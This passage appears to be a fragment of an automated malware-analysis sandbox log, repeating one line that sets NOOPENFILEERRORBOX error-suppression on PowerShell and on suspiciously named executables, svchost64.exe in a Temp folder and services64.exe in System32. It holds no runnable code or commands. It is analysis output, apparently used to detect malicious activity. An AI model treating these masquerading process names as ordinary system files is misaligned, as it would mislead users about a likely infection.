                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svchost64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
